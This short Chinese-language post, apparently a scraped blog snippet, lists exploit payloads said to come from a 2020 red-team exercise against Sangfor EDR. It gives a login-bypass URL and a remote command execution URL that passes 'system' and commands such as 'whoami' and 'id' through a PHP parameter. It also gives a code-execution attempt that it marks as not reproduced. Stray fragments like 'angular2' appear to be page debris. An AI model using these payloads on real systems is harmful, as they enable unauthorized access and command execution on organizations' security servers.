深信服edr 2020HW 0day
远程命令执行漏洞 远程代码执行漏洞 任意用户登录漏洞
免密码登录 Payload
使用浏览器访问 https://ip:prot/ui/login.php?user=任意字符
原文连接php
远程命令执行
使用浏览器访问 https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami https://ip:prot/tool/log/c.php?strip_slashes=system&host=id&path=id&row=id&limit=id
原文连接html
远程代码执行
https://ip:prot/tool/php_cli.php?code=phpinfo(); 未复现成功
原文连接浏览器
乾坤未定,你我皆是黑马angular2